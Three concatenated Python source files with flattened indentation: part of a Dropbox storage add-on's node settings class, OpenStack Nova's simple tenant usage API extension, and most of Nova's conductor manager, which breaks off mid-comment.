client = Dropbox(external_account.oauth_key)
try:
client.auth_token_revoke()
except DropboxException:
pass
class NodeSettings(BaseOAuthNodeSettings, BaseStorageAddon):
oauth_provider = Provider
serializer = DropboxSerializer
folder = models.TextField(null=True, blank=True)
user_settings = models.ForeignKey(UserSettings, null=True, blank=True, on_delete=models.CASCADE)
_api = None
@property
def api(self):
"""authenticated ExternalProvider instance"""
if self._api is None:
self._api = Provider(self.external_account)
return self._api
@property
def folder_id(self):
return self.folder
@property
def folder_name(self):
return (os.path.split(self.folder or '')[1] or '/ (Full Dropbox)') if self.folder else None
@property
def folder_path(self):
return self.folder
@property
def display_name(self):
return '{0}: {1}'.format(self.config.full_name, self.folder)
def clear_settings(self):
self.folder = None
def get_folders(self, **kwargs):
folder_id = kwargs.get('folder_id')
if folder_id is None:
return [{
'addon': 'dropbox',
'id': '/',
'path': '/',
'kind': 'folder',
'name': '/ (Full Dropbox)',
'urls': {
'folders': api_v2_url('nodes/{}/addons/dropbox/folders/'.format(self.owner._id),
params={'id': '/'}
)
}
}]
client = Dropbox(self.external_account.oauth_key)
try:
folder_id = '' if folder_id == '/' else folder_id
list_folder = client.files_list_folder(folder_id)
contents = [x for x in list_folder.entries]
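# Dropbox paginates folder listings: keep calling
# files_list_folder_continue with the returned cursor until has_more
# is False.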
while list_folder.has_more:
list_folder = client.files_list_folder_continue(list_folder.cursor)
contents += [x for x in list_folder.entries]
except ApiError as error:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST, data={
'message_short': error.user_message_text,
'message_long': error.user_message_text,
})
except DropboxException:
raise HTTPError(http_status.HTTP_400_BAD_REQUEST)
return [
{
'addon': 'dropbox',
'kind': 'folder',
'id': item.path_display,
'name': item.path_display.split('/')[-1],
'path': item.path_display,
'urls': {
'folders': api_v2_url('nodes/{}/addons/dropbox/folders/'.format(self.owner._id),
params={'id': item.path_display}
)
}
}
for item in contents
if isinstance(item, FolderMetadata)
]
def set_folder(self, folder, auth):
self.folder = folder
# Add log to node
self.nodelogger.log(action='folder_selected', save=True)
def deauthorize(self, auth=None, add_log=True):
"""Remove user authorization from this node and log the event."""
folder = self.folder
self.clear_settings()
if add_log:
extra = {'folder': folder}
self.nodelogger.log(action='node_deauthorized', extra=extra, save=True)
self.clear_auth()
def serialize_waterbutler_credentials(self):
if not self.has_auth:
raise exceptions.AddonError('Addon is not authorized')
return {'token': self.external_account.oauth_key}
def serialize_waterbutler_settings(self):
if not self.folder:
raise exceptions.AddonError('Folder is not configured')
return {'folder': self.folder}
def create_waterbutler_log(self, auth, action, metadata):
url = self.owner.web_url_for('addon_view_or_download_file',
path=metadata['path'].strip('/'),
provider='dropbox'
)
self.owner.add_log(
'dropbox_{0}'.format(action),
auth=auth,
params={
'project': self.owner.parent_id,
'node': self.owner._id,
'path': metadata['path'],
'folder': self.folder,
'urls': {
'view': url,
'download': url + '?action=download'
},
},
)
def __repr__(self):
return u'<NodeSettings(node_id={self.owner._primary_key!r})>'.format(self=self)
##### Callback overrides #####
def after_delete(self, user):
self.deauthorize(Auth(user=user), add_log=True)
self.save()
def on_delete(self):
self.deauthorize(add_log=False)
self.save()
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import datetime
import urlparse
from webob import exc
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova.compute import api
from nova.compute import flavors
from nova import exception
from nova.openstack.common.gettextutils import _
from nova.openstack.common import timeutils
ALIAS = 'os-simple-tenant-usage'
authorize_show = extensions.extension_authorizer('compute',
'v3:' + ALIAS + ':show')
authorize_list = extensions.extension_authorizer('compute',
'v3:' + ALIAS + ':list')
def make_usage(elem):
for subelem_tag in ('tenant_id', 'total_local_gb_usage',
'total_vcpus_usage', 'total_memory_mb_usage',
'total_hours', 'start', 'stop'):
subelem = xmlutil.SubTemplateElement(elem, subelem_tag)
subelem.text = subelem_tag
server_usages = xmlutil.SubTemplateElement(elem, 'server_usages')
server_usage = xmlutil.SubTemplateElement(server_usages, 'server_usage',
selector='server_usages')
for subelem_tag in ('instance_id', 'name', 'hours', 'memory_mb',
'local_gb', 'vcpus', 'tenant_id', 'flavor',
'started_at', 'ended_at', 'state', 'uptime'):
subelem = xmlutil.SubTemplateElement(server_usage, subelem_tag)
subelem.text = subelem_tag
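# Illustrative shape of the serialized output (assuming the standard
# xmlutil rendering):
# <tenant_usage>
#   <tenant_id>...</tenant_id> ... <total_hours>...</total_hours>
#   <server_usages>
#     <server_usage><instance_id>...</instance_id> ...</server_usage>
#   </server_usages>
# </tenant_usage>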
class SimpleTenantUsageTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('tenant_usage', selector='tenant_usage')
make_usage(root)
return xmlutil.MasterTemplate(root, 1)
class SimpleTenantUsagesTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('tenant_usages')
elem = xmlutil.SubTemplateElement(root, 'tenant_usage',
selector='tenant_usages')
make_usage(elem)
return xmlutil.MasterTemplate(root, 1)
class SimpleTenantUsageController(object):
def _hours_for(self, instance, period_start, period_stop):
launched_at = instance['launched_at']
terminated_at = instance['terminated_at']
if terminated_at is not None:
if not isinstance(terminated_at, datetime.datetime):
terminated_at = timeutils.parse_strtime(terminated_at,
"%Y-%m-%d %H:%M:%S.%f")
if launched_at is not None:
if not isinstance(launched_at, datetime.datetime):
launched_at = timeutils.parse_strtime(launched_at,
"%Y-%m-%d %H:%M:%S.%f")
if terminated_at and terminated_at < period_start:
return 0
# nothing if it started after the usage report ended
if launched_at and launched_at > period_stop:
return 0
if launched_at:
# if instance launched after period_start, don't charge for time before launch
start = max(launched_at, period_start)
if terminated_at:
# if instance stopped before period_stop, don't charge after
stop = min(period_stop, terminated_at)
else:
# instance is still running, so charge them up to current time
stop = period_stop
dt = stop - start
seconds = (dt.days * 3600 * 24 + dt.seconds +
dt.microseconds / 1000000.0)
return seconds / 3600.0
else:
# instance hasn't launched, so no charge
return 0
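# Worked example (illustrative): for a 720-hour report window, an
# instance launched 36 hours into the window and still running at
# period_stop is billed from max(launched_at, period_start) to
# period_stop, i.e. 684.0 hours; one terminated before period_start
# contributes 0.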
def _get_flavor(self, context, compute_api, instance, flavors_cache):
"""Get flavor information from the instance's system_metadata,
allowing a fallback to lookup by-id for deleted instances only.
"""
try:
return flavors.extract_flavor(instance)
except KeyError:
if not instance['deleted']:
# Only support the fallback mechanism for deleted instances
# that would have been skipped by migration #153
raise
flavor_type = instance['instance_type_id']
if flavor_type in flavors_cache:
return flavors_cache[flavor_type]
try:
it_ref = compute_api.get_instance_type(context, flavor_type)
flavors_cache[flavor_type] = it_ref
except exception.InstanceTypeNotFound:
# can't bill if there is no instance type
it_ref = None
return it_ref
def _tenant_usages_for_period(self, context, period_start,
period_stop, tenant_id=None, detailed=True):
compute_api = api.API()
instances = compute_api.get_active_by_window(context,
period_start,
period_stop,
tenant_id)
rval = {}
flavors_cache = {}
for instance in instances:
info = {}
info['hours'] = self._hours_for(instance,
period_start,
period_stop)
flavor = self._get_flavor(context, compute_api, instance,
flavors_cache)
if not flavor:
continue
info['instance_id'] = instance['uuid']
info['name'] = instance['display_name']
info['memory_mb'] = flavor['memory_mb']
info['local_gb'] = flavor['root_gb'] + flavor['ephemeral_gb']
info['vcpus'] = flavor['vcpus']
info['tenant_id'] = instance['project_id']
info['flavor'] = flavor['name']
info['started_at'] = instance['launched_at']
info['ended_at'] = instance['terminated_at']
if info['ended_at']:
info['state'] = 'terminated'
else:
info['state'] = instance['vm_state']
now = timeutils.utcnow()
if info['state'] == 'terminated':
delta = info['ended_at'] - info['started_at']
else:
delta = now - info['started_at']
info['uptime'] = delta.days * 24 * 3600 + delta.seconds
if info['tenant_id'] not in rval:
summary = {}
summary['tenant_id'] = info['tenant_id']
if detailed:
summary['server_usages'] = []
summary['total_local_gb_usage'] = 0
summary['total_vcpus_usage'] = 0
summary['total_memory_mb_usage'] = 0
summary['total_hours'] = 0
summary['start'] = period_start
summary['stop'] = period_stop
rval[info['tenant_id']] = summary
summary = rval[info['tenant_id']]
summary['total_local_gb_usage'] += info['local_gb'] * info['hours']
summary['total_vcpus_usage'] += info['vcpus'] * info['hours']
summary['total_memory_mb_usage'] += (info['memory_mb'] *
info['hours'])
summary['total_hours'] += info['hours']
if detailed:
summary['server_usages'].append(info)
return rval.values()
def _parse_datetime(self, dtstr):
if not dtstr:
return timeutils.utcnow()
elif isinstance(dtstr, datetime.datetime):
return dtstr
try:
return timeutils.parse_strtime(dtstr, "%Y-%m-%dT%H:%M:%S")
except Exception:
try:
return timeutils.parse_strtime(dtstr, "%Y-%m-%dT%H:%M:%S.%f")
except Exception:
return timeutils.parse_strtime(dtstr, "%Y-%m-%d %H:%M:%S.%f")
def _get_datetime_range(self, req):
qs = req.environ.get('QUERY_STRING', '')
env = urlparse.parse_qs(qs)
# NOTE(lzyeval): env.get() always returns a list
period_start = self._parse_datetime(env.get('start', [None])[0])
period_stop = self._parse_datetime(env.get('end', [None])[0])
if not period_start < period_stop:
msg = _("Invalid start time. The start time cannot occur after "
"the end time.")
raise exc.HTTPBadRequest(explanation=msg)
detailed = env.get('detailed', ['0'])[0] == '1'
return (period_start, period_stop, detailed)
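# Example (hypothetical request): '?start=2013-06-01T00:00:00&detailed=1'
# parses to {'start': ['2013-06-01T00:00:00'], 'detailed': ['1']}; the
# [0] indexing above takes the first (usually only) value of each list.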
@wsgi.serializers(xml=SimpleTenantUsagesTemplate)
def index(self, req):
"""Retrieve tenant_usage for all tenants."""
context = req.environ['nova.context']
authorize_list(context)
(period_start, period_stop, detailed) = self._get_datetime_range(req)
now = timeutils.utcnow()
if period_stop > now:
period_stop = now
usages = self._tenant_usages_for_period(context,
period_start,
period_stop,
detailed=detailed)
return {'tenant_usages': usages}
@wsgi.serializers(xml=SimpleTenantUsageTemplate)
def show(self, req, id):
"""Retrieve tenant_usage for a specified tenant."""
tenant_id = id
context = req.environ['nova.context']
authorize_show(context, {'project_id': tenant_id})
(period_start, period_stop, ignore) = self._get_datetime_range(req)
now = timeutils.utcnow()
if period_stop > now:
period_stop = now
usage = self._tenant_usages_for_period(context,
period_start,
period_stop,
tenant_id=tenant_id,
detailed=True)
if usage:
usage = usage[0]
else:
usage = {}
return {'tenant_usage': usage}
class SimpleTenantUsage(extensions.V3APIExtensionBase):
"""Simple tenant usage extension."""
name = "SimpleTenantUsage"
alias = ALIAS
namespace = ("http://docs.openstack.org/compute/ext/"
"os-simple-tenant-usage/api/v3")
version = 1
def get_resources(self):
res = [extensions.ResourceExtension('os-simple-tenant-usage',
SimpleTenantUsageController())]
return res
def get_controller_extensions(self):
"""It's an abstract function V3APIExtensionBase and the extension
will not be loaded without it.
"""
return []
|
|
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Handles database requests from other nova services."""
from oslo import messaging
import six
from nova.api.ec2 import ec2utils
from nova import block_device
from nova.cells import rpcapi as cells_rpcapi
from nova.compute import api as compute_api
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova.conductor.tasks import live_migrate
from nova.db import base
from nova import exception
from nova.image import glance
from nova import manager
from nova import network
from nova.network.security_group import openstack_driver
from nova import notifications
from nova.objects import base as nova_object
from nova.objects import instance as instance_obj
from nova.objects import migration as migration_obj
from nova.openstack.common import excutils
from nova.openstack.common.gettextutils import _
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
from nova import quota
from nova.scheduler import rpcapi as scheduler_rpcapi
from nova.scheduler import utils as scheduler_utils
LOG = logging.getLogger(__name__)
# Instead of having a huge list of arguments to instance_update(), we just
# accept a dict of fields to update and use this whitelist to validate it.
allowed_updates = ['task_state', 'vm_state', 'expected_task_state',
'power_state', 'access_ip_v4', 'access_ip_v6',
'launched_at', 'terminated_at', 'host', 'node',
'memory_mb', 'vcpus', 'root_gb', 'ephemeral_gb',
'instance_type_id', 'root_device_name', 'launched_on',
'progress', 'vm_mode', 'default_ephemeral_device',
'default_swap_device',
'system_metadata', 'updated_at'
]
# Fields that we want to convert back into a datetime object.
datetime_fields = ['launched_at', 'terminated_at', 'updated_at']
class ConductorManager(manager.Manager):
"""Mission: Conduct things.
The methods in the base API for nova-conductor are various proxy operations
performed on behalf of the nova-compute service running on compute nodes.
Compute nodes are not allowed to directly access the database, so this set
of methods allows them to get specific work done without locally accessing
the database.
The nova-conductor service also exposes an API in the 'compute_task'
namespace. See the ComputeTaskManager class for details.
"""
target = messaging.Target(version='1.64')
def __init__(self, *args, **kwargs):
super(ConductorManager, self).__init__(service_name='conductor',
*args, **kwargs)
self.security_group_api = (
openstack_driver.get_openstack_security_group_driver())
self._network_api = None
self._compute_api = None
self.compute_task_mgr = ComputeTaskManager()
self.quotas = quota.QUOTAS
self.cells_rpcapi = cells_rpcapi.CellsAPI()
self.additional_endpoints.append(self.compute_task_mgr)
@property
def network_api(self):
# NOTE(danms): We need to instantiate our network_api on first use
# to avoid the circular dependency that exists between our init
# and network_api's
if self._network_api is None:
self._network_api = network.API()
return self._network_api
@property
def compute_api(self):
if self._compute_api is None:
self._compute_api = compute_api.API()
return self._compute_api
def ping(self, context, arg):
# NOTE(russellb) This method can be removed in 2.0 of this API. It is
# now a part of the base rpc API.
return jsonutils.to_primitive({'service': 'conductor', 'arg': arg})
@messaging.expected_exceptions(KeyError, ValueError,
exception.InvalidUUID,
exception.InstanceNotFound,
exception.UnexpectedTaskStateError)
def instance_update(self, context, instance_uuid,
updates, service=None):
for key, value in updates.iteritems():
if key not in allowed_updates:
LOG.error(_("Instance update attempted for "
"'%(key)s' on %(instance_uuid)s"),
{'key': key, 'instance_uuid': instance_uuid})
raise KeyError("unexpected update keyword '%s'" % key)
if key in datetime_fields and isinstance(value, six.string_types):
updates[key] = timeutils.parse_strtime(value)
old_ref, instance_ref = self.db.instance_update_and_get_original(
context, instance_uuid, updates)
notifications.send_update(context, old_ref, instance_ref, service)
return jsonutils.to_primitive(instance_ref)
@messaging.expected_exceptions(exception.InstanceNotFound)
def instance_get(self, context, instance_id):
return jsonutils.to_primitive(
self.db.instance_get(context, instance_id))
@messaging.expected_exceptions(exception.InstanceNotFound)
def instance_get_by_uuid(self, context, instance_uuid,
columns_to_join=None):
return jsonutils.to_primitive(
self.db.instance_get_by_uuid(context, instance_uuid,
columns_to_join))
# NOTE(hanlind): This method can be removed in v2.0 of the RPC API.
def instance_get_all(self, context):
return jsonutils.to_primitive(self.db.instance_get_all(context))
def instance_get_all_by_host(self, context, host, node=None,
columns_to_join=None):
if node is not None:
result = self.db.instance_get_all_by_host_and_node(
context.elevated(), host, node)
else:
result = self.db.instance_get_all_by_host(context.elevated(), host,
columns_to_join)
return jsonutils.to_primitive(result)
# NOTE(comstud): This method is now deprecated and can be removed in
# version v2.0 of the RPC API
@messaging.expected_exceptions(exception.MigrationNotFound)
def migration_get(self, context, migration_id):
migration_ref = self.db.migration_get(context.elevated(),
migration_id)
return jsonutils.to_primitive(migration_ref)
# NOTE(comstud): This method is now deprecated and can be removed in
# version v2.0 of the RPC API
def migration_get_unconfirmed_by_dest_compute(self, context,
confirm_window,
dest_compute):
migrations = self.db.migration_get_unconfirmed_by_dest_compute(
context, confirm_window, dest_compute)
return jsonutils.to_primitive(migrations)
def migration_get_in_progress_by_host_and_node(self, context,
host, node):
migrations = self.db.migration_get_in_progress_by_host_and_node(
context, host, node)
return jsonutils.to_primitive(migrations)
# NOTE(comstud): This method can be removed in v2.0 of the RPC API.
def migration_create(self, context, instance, values):
values.update({'instance_uuid': instance['uuid'],
'source_compute': instance['host'],
'source_node': instance['node']})
migration_ref = self.db.migration_create(context.elevated(), values)
return jsonutils.to_primitive(migration_ref)
@messaging.expected_exceptions(exception.MigrationNotFound)
def migration_update(self, context, migration, status):
migration_ref = self.db.migration_update(context.elevated(),
migration['id'],
{'status': status})
return jsonutils.to_primitive(migration_ref)
@messaging.expected_exceptions(exception.AggregateHostExists)
def aggregate_host_add(self, context, aggregate, host):
host_ref = self.db.aggregate_host_add(context.elevated(),
aggregate['id'], host)
return jsonutils.to_primitive(host_ref)
@messaging.expected_exceptions(exception.AggregateHostNotFound)
def aggregate_host_delete(self, context, aggregate, host):
self.db.aggregate_host_delete(context.elevated(),
aggregate['id'], host)
@messaging.expected_exceptions(exception.AggregateNotFound)
def aggregate_get(self, context, aggregate_id):
aggregate = self.db.aggregate_get(context.elevated(), aggregate_id)
return jsonutils.to_primitive(aggregate)
def aggregate_get_by_host(self, context, host, key=None):
aggregates = self.db.aggregate_get_by_host(context.elevated(),
host, key)
return jsonutils.to_primitive(aggregates)
# NOTE(danms): This method is now deprecated and can be removed in
# version 2.0 of the RPC API
def aggregate_metadata_add(self, context, aggregate, metadata,
set_delete=False):
new_metadata = self.db.aggregate_metadata_add(context.elevated(),
aggregate['id'],
metadata, set_delete)
return jsonutils.to_primitive(new_metadata)
# NOTE(danms): This method is now deprecated and can be removed in
# version 2.0 of the RPC API
@messaging.expected_exceptions(exception.AggregateMetadataNotFound)
def aggregate_metadata_delete(self, context, aggregate, key):
self.db.aggregate_metadata_delete(context.elevated(),
aggregate['id'], key)
def aggregate_metadata_get_by_host(self, context, host,
key='availability_zone'):
result = self.db.aggregate_metadata_get_by_host(context, host, key)
return jsonutils.to_primitive(result)
def bw_usage_update(self, context, uuid, mac, start_period,
bw_in=None, bw_out=None,
last_ctr_in=None, last_ctr_out=None,
last_refreshed=None,
update_cells=True):
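# Only write an update when at least one counter was supplied; a call
# with all four counters None is effectively just a read of the
# current usage row.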
if [bw_in, bw_out, last_ctr_in, last_ctr_out].count(None) != 4:
self.db.bw_usage_update(context, uuid, mac, start_period,
bw_in, bw_out, last_ctr_in, last_ctr_out,
last_refreshed,
update_cells=update_cells)
usage = self.db.bw_usage_get(context, uuid, start_period, mac)
return jsonutils.to_primitive(usage)
# NOTE(russellb) This method can be removed in 2.0 of this API. It is
# deprecated in favor of the method in the base API.
def get_backdoor_port(self, context):
return self.backdoor_port
# NOTE(danms): This method can be removed in version 2.0 of this API.
def security_group_get_by_instance(self, context, instance):
group = self.db.security_group_get_by_instance(context,
instance['uuid'])
return jsonutils.to_primitive(group)
# NOTE(danms): This method can be removed in version 2.0 of this API.
def security_group_rule_get_by_security_group(self, context, secgroup):
rules = self.db.security_group_rule_get_by_security_group(
context, secgroup['id'])
return jsonutils.to_primitive(rules, max_depth=4)
def provider_fw_rule_get_all(self, context):
rules = self.db.provider_fw_rule_get_all(context)
return jsonutils.to_primitive(rules)
def agent_build_get_by_triple(self, context, hypervisor, os, architecture):
info = self.db.agent_build_get_by_triple(context, hypervisor, os,
architecture)
return jsonutils.to_primitive(info)
def block_device_mapping_update_or_create(self, context, values,
create=None):
if create is None:
bdm = self.db.block_device_mapping_update_or_create(context,
values)
elif create is True:
bdm = self.db.block_device_mapping_create(context, values)
else:
bdm = self.db.block_device_mapping_update(context,
values['id'],
values)
# NOTE(comstud): 'bdm' is always in the new format, so we
# account for this in cells/messaging.py
self.cells_rpcapi.bdm_update_or_create_at_top(context, bdm,
create=create)
def block_device_mapping_get_all_by_instance(self, context, instance,
legacy=True):
bdms = self.db.block_device_mapping_get_all_by_instance(
context, instance['uuid'])
if legacy:
bdms = block_device.legacy_mapping(bdms)
return jsonutils.to_primitive(bdms)
def block_device_mapping_destroy(self, context, bdms=None,
instance=None, volume_id=None,
device_name=None):
if bdms is not None:
for bdm in bdms:
self.db.block_device_mapping_destroy(context, bdm['id'])
# NOTE(comstud): bdm['id'] will be different in API cell,
# so we must try to destroy by device_name or volume_id.
# We need an instance_uuid in order to do this properly,
# too.
# I hope to clean a lot of this up in the object
# implementation.
instance_uuid = (bdm['instance_uuid'] or
(instance and instance['uuid']))
if not instance_uuid:
continue
# Better to be safe than sorry. device_name is not
# NULLable, however it could be an empty string.
if bdm['device_name']:
self.cells_rpcapi.bdm_destroy_at_top(
context, instance_uuid,
device_name=bdm['device_name'])
elif bdm['volume_id']:
self.cells_rpcapi.bdm_destroy_at_top(
context, instance_uuid,
volume_id=bdm['volume_id'])
elif instance is not None and volume_id is not None:
self.db.block_device_mapping_destroy_by_instance_and_volume(
context, instance['uuid'], volume_id)
self.cells_rpcapi.bdm_destroy_at_top(
context, instance['uuid'], volume_id=volume_id)
elif instance is not None and device_name is not None:
self.db.block_device_mapping_destroy_by_instance_and_device(
context, instance['uuid'], device_name)
self.cells_rpcapi.bdm_destroy_at_top(
context, instance['uuid'], device_name=device_name)
else:
# NOTE(danms): This shouldn't happen
raise exception.Invalid(_("Invalid block_device_mapping_destroy"
" invocation"))
def instance_get_all_by_filters(self, context, filters, sort_key,
sort_dir, columns_to_join=None,
use_slave=False):
result = self.db.instance_get_all_by_filters(
context, filters, sort_key, sort_dir,
columns_to_join=columns_to_join, use_slave=use_slave)
return jsonutils.to_primitive(result)
# NOTE(hanlind): This method can be removed in v2.0 of the RPC API.
def instance_get_all_hung_in_rebooting(self, context, timeout):
result = self.db.instance_get_all_hung_in_rebooting(context, timeout)
return jsonutils.to_primitive(result)
def instance_get_active_by_window(self, context, begin, end=None,
project_id=None, host=None):
# Unused, but cannot remove until major RPC version bump
result = self.db.instance_get_active_by_window(context, begin, end,
project_id, host)
return jsonutils.to_primitive(result)
def instance_get_active_by_window_joined(self, context, begin, end=None,
project_id=None, host=None):
result = self.db.instance_get_active_by_window_joined(
context, begin, end, project_id, host)
return jsonutils.to_primitive(result)
def instance_destroy(self, context, instance):
result = self.db.instance_destroy(context, instance['uuid'])
return jsonutils.to_primitive(result)
def instance_info_cache_delete(self, context, instance):
self.db.instance_info_cache_delete(context, instance['uuid'])
# NOTE(hanlind): This method is now deprecated and can be removed in
# version v2.0 of the RPC API.
def instance_info_cache_update(self, context, instance, values):
self.db.instance_info_cache_update(context, instance['uuid'],
values)
# NOTE(danms): This method is now deprecated and can be removed in
# version v2.0 of the RPC API.
def instance_type_get(self, context, instance_type_id):
result = self.db.flavor_get(context, instance_type_id)
return jsonutils.to_primitive(result)
def instance_fault_create(self, context, values):
result = self.db.instance_fault_create(context, values)
return jsonutils.to_primitive(result)
# NOTE(kerrin): This method can be removed in v2.0 of the RPC API.
def vol_get_usage_by_time(self, context, start_time):
result = self.db.vol_get_usage_by_time(context, start_time)
return jsonutils.to_primitive(result)
# NOTE(kerrin): The last_refreshed argument is unused by this method
# and can be removed in v2.0 of the RPC API.
def vol_usage_update(self, context, vol_id, rd_req, rd_bytes, wr_req,
wr_bytes, instance, last_refreshed=None,
update_totals=False):
vol_usage = self.db.vol_usage_update(context, vol_id,
rd_req, rd_bytes,
wr_req, wr_bytes,
instance['uuid'],
instance['project_id'],
instance['user_id'],
instance['availability_zone'],
update_totals)
# We have just updated the database, so send the notification now
self.notifier.info(context, 'volume.usage',
compute_utils.usage_volume_info(vol_usage))
@messaging.expected_exceptions(exception.ComputeHostNotFound,
exception.HostBinaryNotFound)
def service_get_all_by(self, context, topic=None, host=None, binary=None):
if not any((topic, host, binary)):
result = self.db.service_get_all(context)
elif all((topic, host)):
if topic == 'compute':
result = self.db.service_get_by_compute_host(context, host)
# FIXME(comstud) Potentially remove this on bump to v2.0
result = [result]
else:
result = self.db.service_get_by_host_and_topic(context,
host, topic)
elif all((host, binary)):
result = self.db.service_get_by_args(context, host, binary)
elif topic:
result = self.db.service_get_all_by_topic(context, topic)
elif host:
result = self.db.service_get_all_by_host(context, host)
return jsonutils.to_primitive(result)
def action_event_start(self, context, values):
evt = self.db.action_event_start(context, values)
return jsonutils.to_primitive(evt)
def action_event_finish(self, context, values):
evt = self.db.action_event_finish(context, values)
return jsonutils.to_primitive(evt)
def service_create(self, context, values):
svc = self.db.service_create(context, values)
return jsonutils.to_primitive(svc)
@messaging.expected_exceptions(exception.ServiceNotFound)
def service_destroy(self, context, service_id):
self.db.service_destroy(context, service_id)
def compute_node_create(self, context, values):
result = self.db.compute_node_create(context, values)
return jsonutils.to_primitive(result)
def compute_node_update(self, context, node, values, prune_stats=False):
# NOTE(belliott) prune_stats is no longer relevant and will be
# ignored
if isinstance(values.get('stats'), dict):
# NOTE(danms): In Icehouse, the 'stats' was changed from a dict
# to a JSON string. If we get a dict-based value, convert it to
# JSON, which the lower layers now expect. This can be removed
# in version 2.0 of the RPC API
values['stats'] = jsonutils.dumps(values['stats'])
result = self.db.compute_node_update(context, node['id'], values)
return jsonutils.to_primitive(result)
def compute_node_delete(self, context, node):
result = self.db.compute_node_delete(context, node['id'])
return jsonutils.to_primitive(result)
@messaging.expected_exceptions(exception.ServiceNotFound)
def service_update(self, context, service, values):
svc = self.db.service_update(context, service['id'], values)
return jsonutils.to_primitive(svc)
def task_log_get(self, context, task_name, begin, end, host, state=None):
result = self.db.task_log_get(context, task_name, begin, end, host,
state)
return jsonutils.to_primitive(result)
def task_log_begin_task(self, context, task_name, begin, end, host,
task_items=None, message=None):
result = self.db.task_log_begin_task(context.elevated(), task_name,
begin, end, host, task_items,
message)
return jsonutils.to_primitive(result)
def task_log_end_task(self, context, task_name, begin, end, host,
errors, message=None):
result = self.db.task_log_end_task(context.elevated(), task_name,
begin, end, host, errors, message)
return jsonutils.to_primitive(result)
def notify_usage_exists(self, context, instance, current_period=False,
ignore_missing_network_data=True,
system_metadata=None, extra_usage_info=None):
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period,
ignore_missing_network_data,
system_metadata, extra_usage_info)
def security_groups_trigger_handler(self, context, event, args):
self.security_group_api.trigger_handler(event, context, *args)
def security_groups_trigger_members_refresh(self, context, group_ids):
self.security_group_api.trigger_members_refresh(context, group_ids)
def network_migrate_instance_start(self, context, instance, migration):
self.network_api.migrate_instance_start(context, instance, migration)
def network_migrate_instance_finish(self, context, instance, migration):
self.network_api.migrate_instance_finish(context, instance, migration)
def quota_commit(self, context, reservations, project_id=None,
user_id=None):
quota.QUOTAS.commit(context, reservations, project_id=project_id,
user_id=user_id)
def quota_rollback(self, context, reservations, project_id=None,
user_id=None):
quota.QUOTAS.rollback(context, reservations, project_id=project_id,
user_id=user_id)
def get_ec2_ids(self, context, instance):
ec2_ids = {}
ec2_ids['instance-id'] = ec2utils.id_to_ec2_inst_id(instance['uuid'])
ec2_ids['ami-id'] = ec2utils.glance_id_to_ec2_id(context,
instance['image_ref'])
for image_type in ['kernel', 'ramdisk']:
image_id = instance.get('%s_id' % image_type)
if image_id is not None:
ec2_image_type = ec2utils.image_type(image_type)
ec2_id = ec2utils.glance_id_to_ec2_id(context, image_id,
ec2_image_type)
ec2_ids['%s-id' % image_type] = ec2_id
return ec2_ids
# NOTE(danms): This method is now deprecated and can be removed in
# version v2.0 of the RPC API
def compute_stop(self, context, instance, do_cast=True):
# NOTE(mriedem): Clients using an interface before 1.43 will be sending
# dicts so we need to handle that here since compute/api::stop()
# requires an object.
if isinstance(instance, dict):
instance = instance_obj.Instance._from_db_object(
context, instance_obj.Instance(), instance)
self.compute_api.stop(context, instance, do_cast)
# NOTE(comstud): This method is now deprecated and can be removed in
# version v2.0 of the RPC API
def compute_confirm_resize(self, context, instance, migration_ref):
if isinstance(instance, dict):
attrs = ['metadata', 'system_metadata', 'info_cache',
'security_groups']
instance = instance_obj.Instance._from_db_object(
context, instance_obj.Instance(), instance,
expected_attrs=attrs)
if isinstance(migration_ref, dict):
migration_ref = migration_obj.Migration._from_db_object(
context.elevated(), migration_ref)
self.compute_api.confirm_resize(context, instance,
migration=migration_ref)
def compute_unrescue(self, context, instance):
self.compute_api.unrescue(context, instance)
def _object_dispatch(self, target, method, context, args, kwargs):
"""Dispatch a call to an object method.
This ensures that object methods get called and any exception
that is raised gets wrapped in an ExpectedException for forwarding
back to the caller (without spamming the conductor logs).
"""
try:
# NOTE(danms): Keep the getattr inside the try block since
# a missing method is really a client problem
return getattr(target, method)(context, *args, **kwargs)
except Exception:
raise messaging.ExpectedException()
def object_class_action(self, context, objname, objmethod,
objver, args, kwargs):
"""Perform a classmethod action on an object."""
objclass = nova_object.NovaObject.obj_class_from_name(objname,
objver)
result = self._object_dispatch(objclass, objmethod, context,
args, kwargs)
# NOTE(danms): The RPC layer will convert to primitives for us,
# but in this case, we need to honor the version the client is
# asking for, so we do it before returning here.
return (result.obj_to_primitive(target_version=objver)
if isinstance(result, nova_object.NovaObject) else result)
def object_action(self, context, objinst, objmethod, args, kwargs):
"""Perform an action on an object."""
oldobj = objinst.obj_clone()
result = self._object_dispatch(objinst, objmethod, context,
args, kwargs)
updates = dict()
# NOTE(danms): Diff the object with the one passed to us and
# generate a list of changes to forward back
for name, field in objinst.fields.items():
if not objinst.obj_attr_is_set(name):
# Avoid demand-loading anything
continue
if (not oldobj.obj_attr_is_set(name) or
oldobj[name] != objinst[name]):
updates[name] = field.to_primitive(objinst, name,
objinst[name])
# This is safe since a field named this would conflict with the
# method anyway
updates['obj_what_changed'] = objinst.obj_what_changed()
return updates, result
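# Illustrative return value (hypothetical): if objmethod changed only
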